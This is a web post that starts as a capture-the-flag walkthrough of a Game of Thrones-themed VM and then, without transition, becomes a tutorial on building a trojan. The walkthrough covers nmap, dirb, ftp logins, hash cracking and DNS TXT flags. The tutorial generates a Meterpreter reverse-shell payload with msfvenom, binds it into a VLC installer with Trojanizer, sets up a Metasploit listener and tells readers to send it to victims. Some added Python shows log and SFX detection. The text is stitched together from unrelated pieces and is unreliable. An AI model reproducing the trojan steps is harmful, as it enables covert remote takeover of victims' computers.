Hack the Game of Thrones CTF (CTF Challenge part 1)

Hello friends! Today we are going to take on another CTF challenge known as C0m80. The credit for making this VM goes to “OscarAkaElvis”, and it is another capture-the-flag challenge in which our goal is to collect all the flags to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start by finding the IP of the VM (here it is 192.168.1.133, but you will have to find your own).
netdiscover



Use nmap for port enumeration.
nmap -p- -sV 192.168.1.133

We find that port 80 is running HTTP, so we open the IP in our browser.


We take a look at the source code and find the flag syntax.



Use dirb to enumerate the directories.




We find the robots.txt file; opening it, we find a few directories.



We open the directory /secret-island/ using the User-Agent Three-eyed-raven.


We open it and find a link to a map.



When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using the User-Agent Three-eyed-raven.
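From the defender's side, the enumeration above (dirb producing a burst of 404s, then robots.txt-listed paths fetched with a non-browser User-Agent) leaves a clear trace in the web server's access log. The Python below is an added example, not part of the original walkthrough; it runs that detection over a few constructed combined-format log lines, and the IPs, timestamps and 404 threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample access-log lines in combined format (not taken from the original post).
SAMPLE_LOG = """\
192.168.1.50 - - [01/Jan/2018:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 211 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [01/Jan/2018:10:00:02 +0000] "GET /admin/ HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [01/Jan/2018:10:00:02 +0000] "GET /backup/ HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [01/Jan/2018:10:00:02 +0000] "GET /cgi-bin/ HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [01/Jan/2018:10:00:03 +0000] "GET /test/ HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [01/Jan/2018:10:00:03 +0000] "GET /secret-island/ HTTP/1.1" 200 512 "-" "Three-eyed-raven"
192.168.1.77 - - [01/Jan/2018:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.168.1.77 - - [01/Jan/2018:10:01:05 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# client, method, path, status and user-agent from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Directories the site lists in robots.txt; the walkthrough fetches them with a custom User-Agent.
ROBOTS_PATHS = {"/secret-island/", "/direct-access-to-kings-landing/"}

def parse(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status, ua = m.groups()
    return {"ip": ip, "method": method, "path": path, "status": int(status), "ua": ua}

def analyse(log_text, not_found_threshold=3):
    """Return (ips_with_many_404s, robots_path_hits_with_non_browser_ua)."""
    not_found = Counter()
    special = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["status"] == 404:                      # dirb wordlists produce runs of 404s
            not_found[rec["ip"]] += 1
        if rec["path"] in ROBOTS_PATHS and not rec["ua"].startswith("Mozilla/"):
            special.append((rec["ip"], rec["path"], rec["ua"]))
    brute = sorted(ip for ip, n in not_found.items() if n >= not_found_threshold)
    return brute, special

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```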


We open the directory, take a look at the source code and find what look like ports for port knocking, along with the username oberynmartell.





We then find the /h/i/d/d/e/n/ directory using dirb and open it.


We take a look at the source code and find the password for oberynmartell.



We connect with ftp using the username and password we found earlier. We get the first flag as soon as we log in.



We find two files and download them through ftp; one of them tells us the type of hash used.
We save the hash in a file.



Now we use John the Ripper to crack the hash and find the password to be stark.
john --format=dynamic_2008 hash.txt




Now we use mcrypt to decrypt the encrypted file we found on the ftp server.
mcrypt -d the_wall.txt.nc






We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.


We log in using the username and password, and find a page with two images.




We take a look at the source code, and we find the second flag.


Along with the second flag we also find a hint that one of the images contains something, so we download it and use strings to look inside the file, and find a domain name.
strings stark_shield.jpg


It hints that the TXT record will contain something useful, so we use nslookup to check the TXT records. We had to make some changes to the domain name to make it valid, and we find our 3rd flag.
nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133


Now we add the new domain name to /etc/hosts and open the link found in the TXT record above.




Bind payload using SFX archive with Trojanizer


How to get Trojanizer?
You can clone using this Github link:
Command: git clone https://github.com/r00t-3xp10it/trojanizer.git



Now, before running Trojanizer, we create a payload using msfvenom.
Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe


Running Trojanizer

Open a terminal in the directory where you cloned the repository. There you will find a Trojanizer.sh file; run it using
Command: ./Trojanizer.sh
Trojanizer has some prerequisites which it will try to install on the initial run. If it cannot, you can install the prerequisites below manually:
Wine, WinRAR and Zenity.



After loading, the tool asks whether you want to execute the framework.



Clicking Yes opens a window titled Payload to Be Compressed; here we select the payload we created with msfvenom at the beginning of the practical.




After selecting the payload, another window opens, titled Legit Application to Trojanize.



Here we have to select a legitimate software file (.exe) to bind with our payload. I am binding the VLC Player installer with my payload.


After clicking OK we are asked for a new name for the combined file. Name it like any installer file, for example vlc-32bit-Installer or vlc-update64, or anything of your choice.



Now we have to select an icon for the combined file. You can choose from the default list or download an icon file (.ico) from Google.



I have downloaded the VLC icon. As you can see in the above image, I am adding the vlc-icon.ico file as the icon.
Note: Trojanizer works with WinRAR, and because of that the icon often does not bind to the combined file; instead it shows a WinRAR icon. It is a bug we hope will soon be fixed.
After selecting the icon file, you are shown a window giving the path of the newly created combined executable.



Now let's start a listener on the port we set as lport earlier. Open the Metasploit Framework and type:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run


Now send the malicious software to the victim by any means you desire.
When the user opens the file, they are greeted with the normal security warning shown for any downloaded installer.



After clicking Run, the user sees the VLC installer running and suspects nothing.





That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.
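For incident responders, a binary produced this way is a WinRAR SFX: a PE stub with the RAR archive appended after the last section. The Python below is an added example, not part of Trojanizer or the original post; it computes where the PE image ends from the section table, checks the overlay for RAR4/RAR5 markers, and exercises the check on a constructed stand-in (a minimal fake PE plus a RAR5 marker) rather than a real SFX.

```python
import struct

RAR4_SIG = b"Rar!\x1a\x07\x00"      # RAR 1.5-4.x marker block
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"  # RAR 5.x signature

def pe_image_end(data):
    """Offset where the last PE section's raw data ends, or None if not a parseable PE."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4                        # COFF file header, 20 bytes
    if len(data) < coff + 20:
        return None
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    sect = coff + 20 + opt_size                # first IMAGE_SECTION_HEADER, 40 bytes each
    if len(data) < sect + 40 * num_sections:
        return None
    end = 0
    for i in range(num_sections):              # SizeOfRawData, PointerToRawData at +16, +20
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end

def inspect_sfx(data):
    """Report any RAR archive found in the overlay (bytes after the PE image)."""
    end = pe_image_end(data)
    if end is None:
        return {"is_pe": False}
    overlay = data[end:]
    for name, sig in (("RAR5", RAR5_SIG), ("RAR4", RAR4_SIG)):
        pos = overlay.find(sig)
        if pos != -1:
            return {"is_pe": True, "overlay_bytes": len(overlay),
                    "rar": name, "archive_offset": end + pos}
    return {"is_pe": True, "overlay_bytes": len(overlay), "rar": None}

def build_sample():
    """Constructed stand-in for an SFX: minimal fake PE stub + RAR5 marker (not a real binary)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)     # 1 section, no optional header
    section = struct.pack("<8sIIII", b".text", 0x200, 0x1000, 0x200, 0x80) + b"\0" * 16
    stub = dos + b"PE\0\0" + coff + section + b"\xCC" * 0x200       # headers end at 0x80
    return stub + RAR5_SIG + b"\0" * 16                              # appended archive marker

if __name__ == "__main__":
    print(inspect_sfx(build_sample()))
```

Run it over a real file with `inspect_sfx(open(path, "rb").read())`; a large overlay with a RAR marker is the signature worth alerting on, since ordinary installers rarely carry one.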